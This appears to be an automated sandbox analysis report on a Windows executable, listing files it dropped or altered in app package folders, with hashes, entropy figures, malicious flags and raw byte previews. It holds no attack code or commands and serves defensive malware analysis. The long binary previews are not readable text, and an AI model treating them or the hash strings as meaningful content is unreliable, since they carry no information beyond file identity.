SSDEEP:	192:qQ9LZOswNGYbQCEMHlYL+UisSlxt2xrH7Lr7k2:qQ9Il5QCEArzkx/LPk2
MD5:	43F59DD609768BB04AA02CEA4EE623AF
SHA1:	84ECB74FEA55318A6A480B087775B60E82771FFF
SHA-256:	F6E549452C840BE4AED30BBFF5B0C8B85F8A944A4A6ACAE7F62CE6649828D5F9
SHA-512:	697CEE66D80B9BEC9B64DDCCA609CB444768CE1E08AA8414DE4134F6A0C7CD58A23E80E25F0B8BAA8999C30BD8B71F68342A36C377632AD5B3FE979F5326E4F5
Malicious:	false
Reputation:	unknown
Preview:	regf....5.A.{y.... ...#h..N..\@.XB.q..u..z............9a.!6>~....6...2.s..#@n.V.u.....f\|.E.xS.........L%B.C..{......A .V........83..D...u5..\|:AP....C.`.bkK...b...X:.....8DX.z...>......3.-b.3..ukz..-..{...o...LB.F@o......Y.(R.cwL ......Z".#...O.%g..Jr..../.....N....`...u%.bu......m.0c.;.[b....w.A.6.}...u.H:.V<...........]..X#.hdX..3..Y....!`$.s....NhK;/...J.7.O..L..Z3..h........=W7P......W`t..qD.w.XA..q\|.<I.jj..<.......mL.7.k0<..u{............i..d.kt..g.?KN.v.Q.P,....<...L...c(Q~..^.=......7.p.U.IXn.4.^.JU.]..h@fD.g....fAH..^9.}>.D.......\.e;.....I)<..\..ca.o......y..x..D.{........Im].0......w..s.\..k.Q...4E~.3_...^Z.N&.b)^N...$b]X..,P..........0.5.B.........VUX.Pi#w.\|.....5s_..".S...>.u[...M._......\|....v..xk=.{.s..3..]\..6..R}nU<Y..b.{.;..L..Z.*.W)4.......2.b#.GF...uLV)hm...q}ZVj7.a..v.A.NN.`....!.._.zt..Q...<..v.L...2..a....ww.G..m...W.A...._...%..Ie..-b..x........Q....5.Z..s.9..`.s..R..eo.i...m0....\..3..nn.....2Yp.q....T..._...x..%...F.y]a.

C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975516375776632
Encrypted:	false
SSDEEP:	192:xhI1l11g0cxAkYgoJPI1kHma3kjhjx81rGwdyoqALxJRY:DkgdWquQ1+kjhlLcOARY
MD5:	E2D57BA46D539ECEE91075B2CA6A473B
SHA1:	2A7DCEB0F27F1192124B1BEA24271BC5CCDC99B7
SHA-256:	7319726D777B5BB50C591692A4950774D622180527E938210FC21E4FCCE744E5
SHA-512:	82D78164F6BFA4A6A801DCB13C7B8FF297657088422A94C225688C76ED5E70CF022746552743D9376AFC196A5239792127628585F763645054609D3502F15B5F
Malicious:	false
Reputation:	unknown
Preview:	regf..Lc.l.~I.ajy...Y...f....D....2..!.\.;..HR<.A[..x\.PT.... }..U.N$<.37..o.T8...............m..........}..d...g]...N..&c[..En.9bW]&...I.....?.ar.?...A.d.^......{If.....3.y.....UX........\.nn...x^.^"....S.`y.?...._..y.Ma..L..Sk....1k...d..]...Zo......:x.0'.UF4....(G<hU..A......#.&.9,.v.D...ACT.......a....P..-.a..W..S.$4o..'....`A..V..r....'.1..dv]r?d..c".5.C.j~.. ......\|o......Scd.Y#.gDO(... 5v.*d...1wO.....t..K......4.,......v.....Nx.......s=....C@...<...)R...P....r.....snj.F..Ga..^9Eh..r.......z.iK........d..J.T..<n.'...b.b..Bf...i]."..7....`...IL#b..q,.'..\|>.0.....j.8.......mszA<M....f.5E.....)0.d..}..vA..W.)..'#`...\.fu.v{.../.x.H.X..O..,4.(..u#.u(S....:.R...\.........lk6m.m ...CC..'....).u.r..u.G...9.....'...G.4J.!..\..._.w.L.".......7U.~....b.`._..]f.#.U.......S.....R..NA.c.cJ......V.U..z.D..]....E.:..@.^...K-..^..0....P...(;...w\^.9..1.nJ...;..v...G.....@].U..H8...Ya.:.....+.ej.o.`.@..... . H.pG.{q.........Tm..\..

C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975818291614948
Encrypted:	false
SSDEEP:	192:/zreFh1C/+681wKkjcEBo7z1KbaSVZ9LNCDJZlXS4:7rE1f1NkAEBoPK1NyS4
MD5:	402DD1F3102FA7E7AD19E57DA19C9EA2
SHA1:	0B5A86A31FEB70724A4EF3FDD595CE7BF1FE9B47
SHA-256:	E3CEA673646EDE78D257443FD1ED8E4B85A5AEE80639FD0F0631D7A09FCD4C8E
SHA-512:	FCD65ABE9939D62D5F92C45EC5DD8E14FC9BD2A6A0E927591D79A7496BE8E15BD7150320C52624B0C37ED181BD6CB64A6EA1B16CB253A5EBF53FE59E8F2BA33F
Malicious:	false
Reputation:	unknown
Preview:	regf.......q.PXVi.M.#.us.qi.cW(BO..?.h...g......d.cWp..u......\|.KgA{..t."K.T....y/J.&..s.$....\|.F.[q3Fr.~5....v....C..~i....^...i.=c?Z<.....b.......+s.o....1d.h.j[.D...?..e.\....Y.....i.d.Z\p.....n!8....f....h..9........!U.A......."D.b.V..kQ...}.r\|-.)o..L.S..>.......y.a.S..[a.C...,....D...i..Uk.s..#m....{....io...T.k....v#5............P.x...x..T)....4.9..%....sb.Fa....1./......9...T.L.&V..yA....%.O...B%.QK...km.p5-...!.C.B!Po..x#hl...>..O.6.s.\bu.;.K...q.....qA....l.A.W.Q....r..y..Q...?.z579~.....#=G{......`.:.Z."m.($A=......z.C.IS..b...{..b..I.m.....Y.a..ZX..(......8...c........ef.t.LC0.@...Q.^. .6.R..*."...c.....$../.1..,~~..oA..<..4.J&......je.3.$..A..7.b#..q/NRH0.......y..u`...m.D{.8O......../o..ng.0h....U_.2.g.:.g...Q...E.../WO^...3....6cG>@br2.+.m..u......^.-..?U......1...Bk..DhE2_.>HK.o.W...N4.t.W"...R,..&)2..P..n\|5..g~..^....o.......I.j<_ >])F..(...W.....p.d..Y..4v.9..[T..9..\|2.N.2.Dk.."...<F.6..b.....!.<...[.T..@{..A@.#.....

C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978554608200949
Encrypted:	false
SSDEEP:	192:gQvYegB6HdkCW04LiI1zDfiaR2xthbzif4tjxzUiVtEl8g:1vGvyI1vqbWIxgB
MD5:	9A75C955C03946A1BEB021F54F470A92
SHA1:	B1E975B92024E5BD73EF8382FE4D98C6FB0CB30E
SHA-256:	A2B18485A2576F5C22CDC5011454C414A2F7419A9C26FD72ABBC9DF9F1ABFEA2
SHA-512:	7F13E8DEC250B70D1A0176CD4774448D933AF2CFEE72C773E939B6FB7E40D664E51917DABCA258C7D43ACB08B2E010E5AC49920D3CA67A62A01AFF57DA93EF6A
Malicious:	false
Reputation:	unknown
Preview:	regf...8.\..A.u......l...F.f.Q..A.a.<.....t..613.0V.;.....T&...&Ge...4..............?.........&Ah.qb.E..c..\.'...'$=@.@.+v.%w....c.Q.P......@...O..-.n..L..2;....l6..5.........*.M.7.u}..{.[8..........9....#PgB...i..Si5........b..n.O`.F{..@ysZ{vD.....T.....KR.\|..GE.J...\.-J..3.'[......r...\....d....$.P8.=.. ._...iX...[..c'T. ~.L%..N[...g\|........p`..q@i.g.....,T....I..&.q..Ce...#...B...p...i...5.....%D..r.......{.}s.V...W!..K.:X.5B.C.k..........QD.S....]..;.;.4.gW.....&..g.....[Edo..`......$j.l..G......=n..t......x...{....;A..Mf..O....+...>OW......0.....g.wNu ..62.>B..E...>.........>...p...p.C...UdC..0.[.,...o......Z.._......+....o...!.77..>..........y.6...oB...g.PnRb......1o.&.CW..4..?...~......s(..1...x... w..&A....5.!E{.....o..&!"c....Z.....MP...RT........((....@.l.....j.7..y.D.I..B..4.}.......@.U..Q.._....H.v}.....eq.A......Hk.j#....)iCFC~..RP..?.l.?........y.ej..)@a.t....0.....j...=5...\<..=.....~{....y.1a.>..._..5.X..U....Y...;..._.....&.

C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978961823812703
Encrypted:	false
SSDEEP:	192:vuGmDGNg54orDzsv4aRfZM/MaVw4Gshgu+1:vu+gyo7dacwdshJq
MD5:	D71760CA1C9BB4A1CAAA4FCDF179D7FD
SHA1:	A17405C52A36D968A971D99C1BE5D1FB43C95C33
SHA-256:	65D30AD6C49C4FDDC4CE6E648086DBD45BC95DF77D2973349EFF5AD66C13F9E3
SHA-512:	3BDB21AD041603308ED8DFC23E057B7AAF1EA628ADAA8112948E29BD702B8A3B02B00E96D3A74A777062848A96667A058BFEC4E3E0F4BB115401595A875EB640
Malicious:	false
Reputation:	unknown
Preview:	regf.X.....:/...j..h...G.)....t.W..oH.q,\3.Q..yu....!....y.q..7.C# ....).3{.h.T."..,..k...N.\{..c.~..W@R3..r..>3..)...>..J.I.(i[.WT.Ae.h....zz...o..m5.k....J....j.}'.....g`.1.O.o...Rf)P.$.E{.d_.\|..~...ko.`.\|P...j..(.!N.....F0.Y.......o.....Z..9....5A.....G.1.y...p.k..;./..}@.O-.bJ..'...N1n:...2b.Lbl.R.h...V.S..`y..\.U...M..N.sb..ySQ].YVJ..K<.zM...M..Q..23oE.....:.6.....P/...vB.....=<:[.J.I.+..ZO.)..V.rh^.!.+..z.:.}...P.~X}..{zJ.L.H..G.....Q=_@.y .e.7^.....N@.~i.l...>}.......9P.X......F..\.n\1v.......5.4.n.63......(...F7....Q....#....6.........]...ai.........I..0.\te."...]p:......<M.:..R"C..[...P]...!.e6..1.#z~.t... &l9p.<{@..91..rA).V....$1[.....e......5QX.d.....9wD3\N.App.......Q@266x...(`S.i..J...l..q..i...E..+.IK..8p...E..$!...>J..:*2Vge..LV.{I^..8..cP..c......p.....1...TUt.b$...........yu...I........`kS...fX..l.DVp....F.<.........<.,.....z........r..p..g.....f.S...Y#...f..SBO[....W(iz>Y.E\..y.......{...@...V...E.mE&T'O..B.i......

C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9766173601129555
Encrypted:	false
SSDEEP:	192:QygfX38G9P4hNjGfbGQUAkHUo7QcYsUAxTY4XgiLsGhL0NN3M:Ngf8G9AhAyHUWQD8SWsaQzc
MD5:	650414CD25DD26812B21DCB62E9F18B6
SHA1:	8AF427066A5373B27FCC8FC49F543AFDC0E63B84
SHA-256:	4802688108B6A66F5FB72702607D4C6FEC8C2DA30086BAE12CC1F568772F8F6C
SHA-512:	BF19888ADB94E89D21C96F95761C396388965432B2176FF649F7B2FBBA88B8A2AC2C7769033D94A293344D850BD8D68D3A33DF15E2323F6C9BEBB183B71A6D1A
Malicious:	false
Reputation:	unknown
Preview:	regf..:.L..F]LT.y..H.n....#..5w.(.e>po~...i...a........-..7.S...~.}....a\z.6...{...o....<.K.TW...3.ELk..)Q..N..d\|..T.)....U...3@...N....oN..?Vj..Hs.:.ue...V.p..H..m..ib.%..8.c...c...L..+..o.:(...\9..nr\|.2...f.?q.L.E..f.V.F.6.-u...e..5...5...W....HIM=...`.z..h.X..Fo.l..a...4.W.$.K.N'8xJ...h......rA...b.^.......a.X.S...v._....g....y.O...2.my.>.U..[..J8..y.-f.hW..._L<......$...Ph.-f.JW.YM.....\|.Sp@..:J)...--\.2Y....75&{.....3...6.....Z.O39..>..3..T,...........c??..#E.m....]v..J.b-tT.F....jY....fw!O.a./....8...I..L1...$..#piJx<}....'MV.......\,@9.......C/...q.h.x...$L...M.....s........3.xM.....\..n.`...q..4.i..=.......^.\|.....s.t....L..J.iR..S.nJ........2......L......!......I..9...e.Ql.+S./.5..x...&:...C....}<..../.-..E........pK&..\Zh.j......]...>lz.yc..y.!........H.}...-..q.d.B.0I.....)(.a..X.dX[.h..P..(.{O.wf.)>.Y.n=.......>..\..-.-..........$.......K.C.L.(D_.R\hP.C.HI.$...0Z.@..#S.a.7...D.K%.6%\qsR.d.KC..z6..w.M[(......12:..l.

C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978515853296214
Encrypted:	false
SSDEEP:	192:r+QpNQHhmndpDDqGi/g1NFOxhZXwROx+NUv1UqM6LJW9EB3:aQDQIn/qpo1NFWvXyOoiUqMkRB3
MD5:	44BF71A0F6F3C843F7E09D7FFF412299
SHA1:	96C1EC64D0308C0B020DCE09317753110ACC8E6A
SHA-256:	89B474141B1DD06CDE5C49A100DBBF6297D875A78803E8FFBB8FE1B18E277CE2
SHA-512:	DF965A8E15625F6B5AFE69E79084D2D7D4B4451F51B32E6913725B888957ED8320A6B7361917E3890BEB093A369540EE0A9921205FCE05A1B82E3CF66CB9D303
Malicious:	false
Reputation:	unknown
Preview:	regf.82.rm1Qn[.k...R.%7ljW4..9.+.P.L8v.4..?..1....cG+p...vTw..'..{.mF....~-.jd...M..........}...a=........r.[.\|<..=i!fZS.....pN.x.V.~....(.F\|L%..h......k.-...8.C"...)r....k.....e%a7.f.....tL~......mJ.....\.M.vp...."V..!>.3.i}..h.P:.F..[..&H;...7)d.......u9....[M,.\|..K..~..Y#^E.<I2A(.T..f.>..;.f.N.xA...y..S"JW.X..(......>.(mX.._.EFB.1....'.... .ih..".Y.S..U..b5D...96~.GL.....F.G.w.G>`xU..rT.\......Z..p.d.x.M.+..X.j....^].Q.v..>.0..+......%...%..b.<.5..Y...e..Gqr....j...V.l...f.p.;.;...m...<.`..x3=....X..z1&.CI......T....4).."g........['..c...Av.' :..:...[-.Th.FL..P....U....%A.+..F.0#4...7go..:1/..J..<O.sX...$.~.8.q.~nk./(RwO..E..j.\|.n\|.$%..f.Y.B..N'....w.n.>It...y....Q..&....^@.y..w....,........}.._h.QeQ,..l.=.D0.M.,.I&.{.:.R.t........X.6UP..?O..8.k..4:{..j.)...s.;~.4Z.M?.<.U.....jO.pY..}(8.n...U.}....`......3.....1s........<.l.*...Sj.ES.g..H.].S.....2.. '.B.....EIOPU....r.].......3...UO.....8.,.$..?v.....X...e..g....4..E.....[eK.

C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.982005364928784
Encrypted:	false
SSDEEP:	96:wPDKAzgcCI0XD7AESdbqaJ6ZaabFVziJrFBgaZYLcweqMIwVcE5mmFGFRaaLKvNg:gl6XfEx3wP/zihbgq+MIwOETALwGvGU
MD5:	D6C9A9EA58A8A1557C0B33DA66B501B1
SHA1:	95E97D36B896A99D9CB08089AFEE07DCAD797510
SHA-256:	BF4204D55A28C9A9D30DC93E6189DFC0C65130B982E6758965D66266A00BAE9B
SHA-512:	5C1D7A1291861349CE7830DCE1C64C2F56C954EB16541E8240F5232247176772FD82E8F16BF2E53675570F803B4EAF045820AE6AF8CFEDB63BB5F1B45E7D0D02
Malicious:	false
Reputation:	unknown
Preview:	regf..}..l.Gat..I..~..?.5........../.....y..D..TMx..^..<.#lk...E.J..I.Z.U=7..Va..{.=y.aC.\|...f..u.....6.=..!"e...I?`.<..!.'1....L\{...}....9.W..TT>v.mA..._.Y_.'^oK.^.^..Q.c....}.^w+g..=.'..)....,Y.M..Y....[..<.@.c..K6..iu.^>.-...>.Yi.8 ...=..]Mk.PwW..hT.9P........<k>....S:+4.d8....A<-.".d....G^Q.@."....09.3%HEr.=].R.-.c...$&.o...:.f.(}..Q..5'M......B..G^M.~.....`..a]T@+...A..O......K........q'A....F.o......t.2...bZ$%37B.E..~.....Ir.c..l.3/%`C3.~.Q%.....fyD4...(Bq...H].O.....N..~tAm.DgMTy.V..?.x^.zH.....h.k.Y....3$..q.2.`s..........8....8./4..1.:...@..x.P.....?.LPn..H.......>....Q...^.R.o.....#z......P..W...uE..c..k..!1.h..0..\|.].c.PhY.N....C!.........a..Y.D..1..!.X.....ub.{.(SB..9D.e.!T$=.;<}.g..iH.ua.X4k......k".4h..G.~w..R.....M...T.O;R.9^...1#..1=..P.`..O...`.GwH..E..G.A....j...K..'pae@o.....C..96.C....2G..Z..l^<.e%...~..>...8..LX..3.........F..._.s`..*....PG.D................"X..o.n.b_N...@.ND..L.)0....V....+..q.s..`.u......\| (..Z)....

C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	24910
Entropy (8bit):	7.992977385144303
Encrypted:	true
SSDEEP:	768:yN4HjZTmbB0kSBZtWLsIHMBn1IwBQiwcKT1:yNolTe0kSBZoLs5VBQfck1
MD5:	BB7E4CA890BABA2F6960D10C7857C2CA
SHA1:	194D60ECF72CB9715542672301AAE356EF3E05DC
SHA-256:	01F562333793D5F8CDB036840F4886D42242FC2B4C8B65839E02F9C5B0680CD2
SHA-512:	010703AF9DD322D4BFF243A47A6020E895D2424826E2AB840C5D07F6CA89A58D7AD154CD4E54C0A11D7F82ACB9599218AE73279B0C043193E3C867F0AA8E05CC
Malicious:	true
Reputation:	unknown
Preview:	.....5t$.t[A...~..]...4...7o..K.@P.0T..]a.....=$.p.%....(K%E...'.<....I..].HT.........(\....Y.s...^t..$.p....&Fc.....9..O..&.e.}x..ulu..%._..] ../..T4....iB....S.ZU..k2.z". h..lt.k.d.9..i..Nhu=..k..od.........^.9.....x.0..!........Z:q(.Y.....<..yrk._:i.3..[\|`......i..G\|.'...........G.YM..8.AR......?.Q@..O...C.../.>\jy...a...0<..D[`.:.@....h......x.}..cg...w%.........9.)Ax..S.Z.m.U......C.....(.7...o......X.A.....1......m...k...n.ym..t.T..^..K.W....'[./.(.n..ei..%_............e@...a\.@..iR.L\.....,....Ur...1.p...?..t.c:x...2pe....g.nm..d..."..A&..Q ...\|T.)`].]...(F.......?..x.N.O.....m...:_....e...H..@.4..E3SP1/..q..F.[9....s..\..E<.q...M;.....z....j.{h.....n%.....pF9...Q...9.............}x.P.<x.2C.......y.+=....n...3.9U....'...X..)]i.8Y`.9m...M.y...x..Z..Q......[.$.k.I.S.....6...K.."....n..v........[...3.d.....Hy....e..J..\|...r....^.........(knF...7...1.@c>b.[..hca.T?.Z4....%.U.q?D..y...S..kp.7.q.......S......h.._.I.cuZw$

C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98200469072384
Encrypted:	false
SSDEEP:	192:6R9VtgECPd7QxticWMBfOZjzsLzSZ5C+qBlzzibjbHk:9ECPSUMhezdZdy24
MD5:	EA260C2001EA7C43D48E67C62CAC5991
SHA1:	F0157594EA08B4A367B24BE2A0EF47587B53FD12
SHA-256:	1EEA7DF0C967341E2F69094BD4E6EAA6B4D11F4CF12713FCF2980FB0E6EAA11E
SHA-512:	99FE87DF0E49763469696AC4B07121FF4FEC00E8AF9A56D9329CA06B12AD067A8B46A62316929E6B775C04DB7459D1A7A9729DD390D20732BB1A318AADBFE118
Malicious:	false
Reputation:	unknown
Preview:	regf..y..../.Y...(.....Y(.ut...z.._NPN.:...)m....OT...y@.l_.pp;.t..L..g"W.o...{.E.,......C..qv.$.G.7.;\G.6.....gg.#.....].. M.1.3.....H..ve.........K.6u....s_.9.x.4n....ucV.S...LPl....,^J.X;...\|....7.....;.v...\yLfwT.jb..z./...e..H..I\|...q.=n.c:.,2..[..1\|.)......`.....0....k.eN....gwE....m.!o?..7.....\Z\...n6?.@.z....K=.3...}...{.....\.4...Q.O.)..&~.....0o..! .ob...aP5....m=x........l:.=.[+p.....\|..7...#...`g...xh.g.z./X.K.S...s......f..$.7..2..kR#^..J.f.u.fQtH.......>.^...b.....UzM.'.x.c..FUzv2}.b.TwaZ$P..W..L.1=...:D..._t....O..!.I....?j.foL\|9.....+.Xo.i..........pR.`.\..v.....=.(y.r.^.?......{......2(.H-.AUb....-.B(.qV....@./........CS...1.c..P.A.#.X..9...)._N...Fse.T]0...L.......X..........j.{F..h..U.>R.-....Vb...H{FHh.......FW.L...rd)....sf.U@..C>....NQ.eH..s.Lvj).y...$.f....R...=..>......&.]Q%_pD{'Q..26h.R..0k.M.0.%{< .2>.0,.]....%. .>%...At..[.n...W.C...SC?......,i1L.[...gB3....b.T..%Pz.\...l.....l.0..,.C...r.[E_6.....T..a

C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977457825403469
Encrypted:	false
SSDEEP:	192:S4UcMf4n+rQKxWqGOjWbxJG0ckC2qStsriVghOLjRPuOqO:S+s4nsxWqdcikCSsaGKlPuO
MD5:	347A951BBABCDB9634A4A0E5C9051E51
SHA1:	C7BB20EC3BE219EA24BDAF680576DE2397FE3A0E
SHA-256:	B2383FD14CDCBE164B5FF1C12F603CA8829983BE9CA94DEEDECA37A90D9B954C
SHA-512:	167C8023214DA0089E9AB01D949866D0FDBE84AD1C76D289BD203CCB0E585EFF7B4CE2D5E8E2C2301E9DA4AB4E5391D4D5549A103CBC0978DC7A2029DA1A7C30
Malicious:	false
Reputation:	unknown
Preview:	regf..A......].H... .D.O"..%......+(........@G.).[...].)"L.......<../Y......!.W.Z4..WW+@TD.@?o..c..U.....y+.t.!f.00...-.M.>..'.h3.>...ha..i&.X.........9,..sW.h..../2>{.f.g.K.}..K.Xo.b....-B_S..-.#....-uc8......:...]....@P.u..I.+...YFx.......2.W..[:H...'~.k..x$......../.m.q.d.A...0.....?O.\.z....Y..]....^..[.S.%.. .6..~6.X1z.f...!..W].....!......~.o-.'I..7.X...V..v$.bN.@.......TJ...N."..%......Zq..s^..es....%y....G.T.9.uw..a.Q.(N.<.Ry...\.+.b.vZ.......\....T..>ij..i8.... ..K..)`S...}i.%'a.NR.z1.....g....=.H.O.....X!.UK...s{..'.x... Xv7..sd.dp....El.f..N..\.99A.mH89.J....3.."uny......N....p.....P..*.T...0Mrw9M....,.:[....K.0i.h>.-.H.`.\|..W....qr.....<..+.y...E;.....:M...[..s.........S.....9....a.......v..rd.>s.2.`/C.....1..sI..5..z.."o6+f!-....]X.-B?l.....3.kE..........g"..Ysk4\|...]t..[.3/..d..).a.HkOgVG.(S....PS...v..Rf.....8....V`.1..>FK..8%...m....$....z...Xoy..4..3~..........b.}@....5.^x.2..B..k..V.I.....5......N.i..

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978763569359822
Encrypted:	false
SSDEEP:	192:VhA99ju1hm0i0xm0Z3swgLr2i8N4DgvgNIPc793wWk4wkn:VhA9eFBxm03+P8XPK93wrGn
MD5:	F995CC5F7484C16F8D7FF2BD13B529D0
SHA1:	E840165E28FDA560C6C2ABCF8C7427C974B4F968
SHA-256:	B9949C4B61449287B4A5DB699321C872FC99DFC3EFB71205CC075C7CA939F63C
SHA-512:	CF3FFE00279E9183E1558A40F64D6116559DBD5BA8F9CDF08D16658A559FF02D13CF9FFEFDA7B1A743192DDFD7F9F7FD094E177C795E538ED088B1D8B84CAA84
Malicious:	false
Reputation:	unknown
Preview:	regf.K9.O./H...YJ.......;..yQ+..X....2......Ig`wz~Go.....1..[;Y...._.p.....%.W..*'....MuO."......U..B.u..!.OD...M.x.%."H...)p.H..E.kx.~../.TGc../PO;.A.....SUl.."...............@.....C..D.."..i.1...O....v...V.K...U.-..g2ZI`....2..F..f..y.2..QD.D.L..8...yH....J...A...0.=1g..{.bi.$....MB.J.:S.h..>...}]W.Ph...._...{.2...Dw.....:R.y..XC.{xe.5A...(w..O.$...-BY......lgW4.....S!. O....o....@.b8.....f........<).`.#.../.Q$.H....0!..S[QT.0...$..~..O..`H.).mX..M.2..r...d.....?.f...N...@.r..Q@.q.0S....8Q.@Q............V.i..Q`.{.?.....N......y...v"..s.nc.;...C....aB.J..;....'...K.\|.=_..XA.4.....{...`Q.p...W}k.........0..5.!%.2.d.{.=S..(.>...:(.0+..C...B.>.u4......ufk'z...'..F.B..K%.kW}....E...J..k..R.g!...b.h...D.$..W.8=..\|..#...61=....m.d.wI".hL.....S.....O)-..C.T..R..$#............dn..(..kI..Zw....6..ct......e. ..u....3.U... .^.).z.}C...W......h.p.s...")Or.........hS...J.n$B8......G.Ul.Id.F..>(...h69..RJn..&>.]yU.C..>fRwz..-..a ~..Y......8!/.!.._...3.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976675660714134
Encrypted:	false
SSDEEP:	192:kwlvU0+zg9A27J4EuivCWDCKxtmNbC0GG11MdFmK:noge27J4Evq4CKxt4r1cB
MD5:	5F549AF051F1948DCF86688ECC4A0DE5
SHA1:	DD06CE86CB0F593B7B71CE92FF0257BB5FB5BD0F
SHA-256:	9D12A5A2E8C097F862985FF6022EEACFB2CB22673EFC914B084CD9CDC08380DA
SHA-512:	4D9AC8AE83A4F38A089C367463A3147AE41AA0D0251BF1BC818B2B41E89829BB6C29ADD5085694EB7414308126FEB1B9A740DC72086E5A466D5BDC01376FF3C3
Malicious:	false
Reputation:	unknown
Preview:	regf.m.N..0Ip..I\...n:.NU..f.K.;.3'.*..6.....}.ZT..;....@7..O.V.}.6..4..9..Tq..h...Ku.....YsN#s6z\|....k..10K......21E-N.ar.%..g...x.Q..G..oE_...XQJ.8.r..8...Y...a.5.L..].T.5..H..@/kB.O...a.<].......T...-..2..v.(\|v..........\..^..5r_{..BF7..x>5_..K..@.r.......2...\.W>.1....JQ_..7.b,.b-........B..DCRNym....Q>.@..(.....B.i.~.p=&..n..=y.).Z.v...#>..EO......SU...Z.<U..R...a....v....?z..#A.L.Qw......y4.D.......>F..T..)..M..........p:ZV..(.Zj]...z.\.j`...I.r.O..L/.....&..A:.....Bv....n..B.m9.{...\|../.X...R.#....]g..I^.K..7?..4.a..d.....[.^..\|.P9...W.U.^.,[p.l..#.....u..U.S..%.o:..g?...T..1T..S{......E].?m.`(]/i..T..L.a...Vm[U.tI..J(..z5...zB..ix.\..S..6..F.F...A20>.a.<!......S.RWQ.A..[B.....s...2...L..5....$.,...F.{...5C....]&.....gS.+.Mn...".......-.\...:./..o.=.t.%.7)..... .."UWS...i.....:....W..1.!..o3.Qp.B.w.P..7..C....c0.S.s.(..>.m.Ii..R..U.YW.@;.G;.m..).?.#%.._..R.x..Z&. Y...:....L!..,.S~../...-..R.K.....2.."..<.",o.xQ.,.kO.l>.X...iC..q.,.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975498082852337
Encrypted:	false
SSDEEP:	192:YGy8uEm7Hqb32FtvivEH/f4mLVGBVGfAtxJD:YGolTqb6NiQ/wmYTGED
MD5:	647533500BA4825E6D46AD1E268A8FDE
SHA1:	475867AE16344F4447B9D93183D8BCE4EF090105
SHA-256:	3282AA4EAB7AF74AD5D8D81191DB9452399C0B4DF761B96519C610F44FF9E906
SHA-512:	B817A3A7B98A3DA554778933F3231C9E9D670DDCBB8749901890A09F326D9D75B26DC81AE5391A309B50119D9EE78F74D69BC7BED27E902AC58C5C27BBF98447
Malicious:	false
Reputation:	unknown
